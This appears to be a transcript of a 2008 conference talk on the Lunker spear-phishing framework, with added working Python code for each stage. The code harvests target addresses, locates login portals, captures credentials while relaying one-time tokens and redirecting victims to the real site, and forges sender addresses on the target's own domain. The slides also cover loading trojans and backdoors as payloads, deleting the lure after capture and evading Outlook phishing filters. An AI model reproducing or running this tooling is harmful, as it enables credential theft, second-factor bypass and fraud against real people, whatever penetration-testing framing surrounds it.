Lunker: The Advanced Phishing Framework


Lunker: The Advanced Phishing Framework Joshua Perrymon CEO, PacketFocus

Agenda: Intro; What is Lunker?; What can it do?; Attack Theory; Payloads; The Old Way; Demo; Questions

Who am I? Joshua Perrymon, CEO, PacketFocus. 12 years' experience in "ethical hacking". Over 200 spear-phishing attacks in 4-5 languages. 85% success ratio using "blacklist" emails from the Internet; MUCH higher using "whitelist" emails.

What is Phishing? Phishing is a method of social engineering used to gain credentials or to have users perform a specific action. We have all received these types of emails: sent out to millions; usually triggers spam-filtering alerts; uses a known phishing site that is usually taken down within a couple of days, if possible.

What is Spear Phishing? A directed phishing attack that targets only a handful of users. Emails are harvested from the Internet or other public places. Very hard to stop, because the attack is not sent out all over the Internet.

Attacking up the OSI. Attacks have been moving up the OSI (Open Systems Interconnection) model.

Attacking up the OSI model cont.

How these attacks work

Doing this the "OLD" way. This takes time, but doesn't require a lot of technical skill. Find emails. Find the site to be phished. Create the site. Set up a PHP mail spoof. Test. Send. Monitor. Before Lunker, setting up a phishing attack required a lot more planning and technical detail: you had to make a new phishing template by hand, set up the backend scripts to capture the credentials, find a server to host it on, figure out how to relay a spoofed email, then log in and either tail the Apache logs or run tcpdump to monitor for results. This is now somewhat automated with the new framework.

Using the Phishing Framework. Easy and repeatable. Show the step-by-step process of using Lunker. Use Camtasia or animations.

Step 1. PacketFocus.com 2008 - Jperrymon

Step 2: Enter Client Info

Client Details. This is entered into the local database, which gives an audit trail of each test's configuration and results. The idea is to document each step automatically, because no one else wants to do it. Enter URL and IP info if provided.

Step 3: Email Recon

But everyone uses their company email address, right? This is hard to protect against most of the time. Internal email addresses usually must be used in business communication, and they leak to Internet search engines. Search for "@acme.com" and look through the results.
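The harvesting step above, as an added example that is not code from the Lunker framework or the original slides: it pulls addresses for the in-scope domain out of search-result text, including common "[at]"/"[dot]" obfuscations and URL-encoded mailto links, and drops look-alike domains such as acme.com.au or partner-acme.com. The domain acme.com and the sample snippets are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample of search-result snippets for the query "@acme.com"
# (acme.com is the hypothetical target domain used throughout).
SAMPLE_RESULTS = """
Contact: John.Doe@acme.com for press inquiries.
Support: support@ACME.COM | sales@partner-acme.com
Jane Smith - jane.smith [at] acme [dot] com
Obfuscated: bob (at) acme.com, mailto:carol%40acme.com
Not in scope: admin@acme.com.au, someone@notacme.com
"""

# Plain addresses. The trailing lookahead keeps "acme.com.au" from being cut to "acme.com".
PLAIN_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}(?![A-Za-z])")
# "user [at] domain [dot] tld" / "user (at) domain.tld" style obfuscation.
OBFUSCATED_RE = re.compile(
    r"([A-Za-z0-9._%+-]+)\s*[\[(]\s*at\s*[\])]\s*"
    r"([A-Za-z0-9.-]+(?:\s*[\[(]\s*dot\s*[\])]\s*[A-Za-z]{2,})*)",
    re.IGNORECASE,
)
DOT_RE = re.compile(r"\s*[\[(]\s*dot\s*[\])]\s*", re.IGNORECASE)


def harvest(text, in_scope_domains):
    """Return sorted, de-duplicated addresses whose domain is exactly one of the in-scope domains."""
    text = unquote(text)  # mailto:carol%40acme.com -> carol@acme.com
    in_scope = {d.lower() for d in in_scope_domains}
    found = set()
    for match in PLAIN_RE.finditer(text):
        found.add(match.group(0))
    for user, domain in OBFUSCATED_RE.findall(text):
        found.add(f"{user}@{DOT_RE.sub('.', domain)}")
    scoped = set()
    for addr in found:
        addr = addr.lower()          # case-insensitive de-duplication
        _, _, domain = addr.rpartition("@")
        if domain in in_scope:       # exact match, so acme.com.au and partner-acme.com are excluded
            scoped.add(addr)
    return sorted(scoped)


if __name__ == "__main__":
    for addr in harvest(SAMPLE_RESULTS, {"acme.com"}):
        print(addr)
```

Feed it the saved result pages (or the text of any public document) and the returned list is the target set for the next step; anything outside the agreed scope is discarded at this point rather than later.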

Step 4: Phishing Analysis

On the lookout. This module actively searches the target URLs and IPs in scope to identify potential phishing targets. Any site that requires credentials remotely should be considered and identified. Top targets include webmail, VPN, and website logins. The tool identifies these portals and returns an analysis based on the information gathered previously.
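An added example of what the portal analysis above has to do, not the framework's own code: parse each in-scope page, keep only forms that carry a password field, work out where they post to, and classify them as webmail, VPN or plain website login from the URL, title and action. The hostnames, page contents and keyword lists are constructed for the example; the keyword table is deliberately small and would be extended from field experience.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample pages for in-scope hosts of the hypothetical target acme.com.
SAMPLE_PAGES = {
    "https://mail.acme.com/owa/auth/logon.aspx": (
        "<html><head><title>Outlook Web Access</title></head><body>"
        '<form action="/owa/auth.owa" method="post">'
        '<input type="text" name="username"><input type="password" name="password">'
        '<input type="submit" value="Log On"></form></body></html>'
    ),
    "https://vpn.acme.com/dana-na/auth/url_default/welcome.cgi": (
        "<html><head><title>Secure Access SSL VPN</title></head><body>"
        '<form action="login.cgi" method="post">'
        '<input type="text" name="username"><input type="password" name="password">'
        '<input type="text" name="realm"></form></body></html>'
    ),
    "http://www.acme.com/account": (
        "<html><head><title>Acme Customer Portal</title></head><body>"
        '<form action="/account/signin" method="post">'
        '<input type="email" name="email"><input type="password" name="pass"></form>'
        "</body></html>"
    ),
    "https://www.acme.com/": (
        "<html><head><title>Acme Inc.</title></head><body>"
        '<form action="/search" method="get"><input type="text" name="q"></form>'
        "</body></html>"
    ),
}

# Words in the URL, title or form action that mark a portal type (assumed, not from the slides).
PORTAL_KEYWORDS = {
    "webmail": ("owa", "webmail", "outlook", "exchange"),
    "vpn": ("vpn", "dana-na", "remote access"),
}


class LoginFormFinder(HTMLParser):
    """Collect every <form> with its action, method and <input> fields, plus the page title."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.forms = []
        self._form = None
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "",
                          "method": (a.get("method") or "get").lower(), "fields": []}
        elif tag == "input" and self._form is not None:
            self._form["fields"].append(((a.get("type") or "text").lower(), a.get("name") or ""))
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None
        elif tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def analyze_page(url, html):
    """One finding per credential form; forms without a password field are not targets."""
    parser = LoginFormFinder()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not any(ftype == "password" for ftype, _ in form["fields"]):
            continue
        post_to = urljoin(url, form["action"])
        haystack = " ".join([url, parser.title, post_to]).lower()
        kind = "website login"
        for candidate, words in PORTAL_KEYWORDS.items():
            if any(w in haystack for w in words):
                kind = candidate
                break
        findings.append({
            "url": url, "kind": kind, "title": parser.title.strip(),
            "post_to": post_to, "method": form["method"],
            "fields": [n for t, n in form["fields"] if t in ("text", "email", "password")],
            "cleartext": post_to.startswith("http://"),  # credentials would cross the wire in clear
        })
    return findings


def scan(pages):
    """Run analyze_page over a {url: html} map of fetched in-scope pages."""
    return [f for url, html in pages.items() for f in analyze_page(url, html)]
```

The `post_to` and `fields` values are exactly what the cloned phishing page has to reproduce, and a `cleartext` portal is worth flagging in the report on its own, independent of the phishing test.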

Step 5: Select the Bait

Email is easy. Most often, a simple email from spoofed technical support is enough to have a user hand over login and password details. Analysis will identify token (one-time) passwords: numeric entries should trigger the token MITM functions. Start the analysis timers.

Verify it works

Now what? Log in to the phishing site locally to make sure it captures the password. It's easy to email the credentials; be responsible and store them encrypted. Modules could auto-login based on the template used: Get email(), Get Attachment(), Get Keyword(), Get Subject().

Redirect Confusion

Where am I? Redirection must be used after the user logs in the first time: an error message, Google, etc., then redirect to the real site. Delete the email sent to the user after getting the credentials.
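The capture, verify and redirect logic of the last three slides, as an added example that is not code from Lunker: the handler records each POST to the cloned form, flags numeric one-time tokens so they can be relayed before they expire, bounces the first static-password attempt back to the cloned form with an error (one reading of "error message ... then redirect to the real site") and sends the second attempt on to the genuine portal. The URLs, field names, modes and the 6-8 digit token rule are assumptions; encrypting the stored records, as the slide advises, is a deployment step not shown here.

```python
import re
import time
from urllib.parse import parse_qs, urlencode

REAL_LOGIN_URL = "https://mail.acme.com/owa/auth/logon.aspx"          # genuine portal (hypothetical)
PHISH_LOGIN_URL = "https://mail-acme.example/owa/auth/logon.aspx"     # our clone (hypothetical)
MODES = ("capture", "capture_login", "capture_login_scrape")
TOKEN_RE = re.compile(r"^\d{6,8}$")   # assumed shape of a hardware/soft token code


def looks_like_token(secret):
    """A 6-8 digit numeric secret is treated as a one-time token rather than a static password."""
    return bool(TOKEN_RE.match(secret.strip()))


class CaptureStore:
    """In-memory record of submissions and per-user attempt counts.
    A real deployment persists these encrypted; this example keeps them in memory only."""

    def __init__(self):
        self.records = []
        self.attempts = {}


def handle_post(body, client_ip, store, mode="capture", now=None):
    """Handle one form POST to the cloned login page.

    Returns (status, headers, action). `action` tells the operator loop what to do:
    'store'      keep the credential (capture mode);
    'login'      replay it through the auto-login module;
    'relay_now'  replay immediately because it is a one-time token that will expire.
    """
    if mode not in MODES:
        raise ValueError(f"unknown mode {mode!r}")
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    user = form.get("username", "").strip().lower()
    secret = form.get("password", "")
    is_token = looks_like_token(secret)
    store.records.append({
        "ts": time.time() if now is None else now,
        "ip": client_ip, "user": user, "secret": secret, "token": is_token, "mode": mode,
    })
    attempt = store.attempts.get(user, 0) + 1
    store.attempts[user] = attempt

    if mode == "capture":
        action = "store"
    elif is_token:
        action = "relay_now"
    else:
        action = "login"

    if attempt == 1 and not is_token:
        # First static password: bounce back to our own form with an error so the user
        # re-types it (filters out typos, looks like an ordinary failed login). Tokens are
        # never bounced, since a second code would just waste the window.
        location = PHISH_LOGIN_URL + "?" + urlencode({"error": "1"})
    else:
        # Second attempt (or a token): send them on to the genuine site.
        location = REAL_LOGIN_URL
    return 302, {"Location": location, "Cache-Control": "no-store"}, action


def verify_capture(store, user, secret):
    """The 'Verify it works' step: log in locally, then confirm the submission was recorded."""
    return any(r["user"] == user.lower() and r["secret"] == secret for r in store.records)


if __name__ == "__main__":
    store = CaptureStore()
    print(handle_post("username=tester&password=Local-Test-1", "127.0.0.1", store, now=0.0))
    print(handle_post("username=tester&password=Local-Test-1", "127.0.0.1", store, now=1.0))
    print("captured:", verify_capture(store, "tester", "Local-Test-1"))
```

Run the local test account through the clone twice before the audit starts: the first response must carry the `?error=1` bounce, the second the redirect to the real portal, and `verify_capture` must return True; if any of the three is wrong, the clone's field names do not match the real form.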

Spoof the email

Tony.. Tony Montana. Set up a spoofed email. The goal is to have the user perform a pre-defined action. Authority, realism, and language play a vital role in a successful attack. The key is to gain trust as soon as possible. NLP (Neuro-Linguistic Programming). Milgram experiment.

Select Footer

Footer. If you want to write a custom body, select a footer template to give the attack structure.

Scenario Options

Pick one. Pre-defined spoofed email scenarios are included with the framework. These are selected conversations that usually get the desired response, based on actual field results. Scenarios: Tech Support; Internal IT; 3rd Party IT; End-User.

Stealthy

Email Head. Sometimes you need to modify the email headers. We will probably put something in here to identify the tool once it goes public.
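The "Spoof the email", "Footer", "Scenario Options" and "Email Head" slides together, as an added example that is not the framework's own code: it fills a scenario template and a footer template, forges the From address on the target organisation's domain, mints a Message-ID on that domain so the headers look internally generated, and lets the operator override or add headers. The scenario and footer texts, the `X-Phish-Audit` marker header (the slide only says some identifier is planned) and all names and URLs are constructed for the example.

```python
from email.message import EmailMessage
from email.utils import formataddr, formatdate, make_msgid

# Constructed scenario and footer templates; the framework ships its own.
SCENARIOS = {
    "tech_support": {
        "from_name": "{org} Technical Support",
        "from_local": "support",
        "subject": "Action required: {org} webmail password expiry",
        "body": (
            "Hello {first_name},\n\n"
            "Our records show your {org} webmail password expires today.\n"
            "To avoid losing access, sign in at {phish_url}\n"
            "and confirm your account details.\n"
        ),
    },
    "internal_it": {
        "from_name": "{org} IT Service Desk",
        "from_local": "helpdesk",
        "subject": "Scheduled maintenance: please re-authenticate",
        "body": (
            "Hello {first_name},\n\n"
            "We migrated the mail servers overnight. Please log in once at\n"
            "{phish_url} so your mailbox is moved to the new system.\n"
        ),
    },
}
FOOTERS = {
    "corporate": "\n--\n{from_name}\n{org} | This message is intended for {target_email} only.\n",
    "none": "",
}


def build_message(scenario, footer, target_email, first_name, org, org_domain, phish_url,
                  extra_headers=None, audit_marker="authorized-test"):
    """Assemble the spoofed message. From is forged as <from_local>@<org_domain>; the
    Message-ID is minted on the same domain. Nothing is sent here; the caller hands the
    message to whatever relay the engagement uses."""
    s = SCENARIOS[scenario]
    from_name = s["from_name"].format(org=org)
    ctx = {"first_name": first_name, "org": org, "phish_url": phish_url,
           "target_email": target_email, "from_name": from_name}
    msg = EmailMessage()
    msg["From"] = formataddr((from_name, f"{s['from_local']}@{org_domain}"))
    msg["To"] = target_email
    msg["Subject"] = s["subject"].format(**ctx)
    msg["Date"] = formatdate(usegmt=True)
    msg["Message-ID"] = make_msgid(domain=org_domain)
    if audit_marker:
        # Hypothetical marker so the engagement can be identified afterwards; the header
        # name is an assumption, the slide only says the released tool will carry one.
        msg["X-Phish-Audit"] = audit_marker
    for name, value in (extra_headers or {}).items():   # per-engagement header edits
        del msg[name]                                    # no error if the header is absent
        msg[name] = value
    msg.set_content(s["body"].format(**ctx) + FOOTERS[footer].format(**ctx))
    return msg


if __name__ == "__main__":
    print(build_message("tech_support", "corporate", "jdoe@acme.com", "John", "Acme",
                        "acme.com", "https://mail-acme.example/owa/").as_string())
```

A forged From on the organisation's own domain only arrives if the receiving MTA does not enforce SPF, DKIM or DMARC for that domain, so check the target's published TXT records before choosing the sender; where they are enforced, a look-alike domain you control is the fallback, and the rest of the builder is unchanged.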

Load the Ammo

Money Shot. This is what makes the framework stand out: the ability to add custom payloads to the phishing email. XSS, browser exploits, recon, trojans, exploits, backdoors, etc. Welcome to hack 2.0.

Test Environment

Test 1.2.3. This module launches the local email client and the locally hosted phishing site at the same time. The tester sends the spoofed email to a locally configured account, which is checked by the email client just as a normal user would. Look for mistakes: the smallest error can cause the attack not to work.

Local Mode

Start the Audit

Just a little patience... Monitor the web server, DB, MTA, and the monitor itself. Set up the MITM scripts to run automatically. Configure alarms and real-time logic. Set up the login options: Capture; Capture/Login; Capture/Login/Scrape.

DEMO. Let's have a look at the current working version. How to bypass the Outlook 2007 phishing filters.

What's Next: MITM for 2nd-factor authentication; advanced payloads (XSS, CSRF, browser exploits, recon to determine the user's browser, OS, etc.); reporting; forum support; template sharing; training modules; user-reaction analysis module; ability to customize the templates.

Thank You. Thanks for sitting through this presentation. The main thing to take away is how attacks are moving up the OSI model and targeting the user ("layer 8"). It doesn't take a lot of technical skill to perform these types of attacks. User awareness is the only way to mitigate this risk; we can't rely on technology.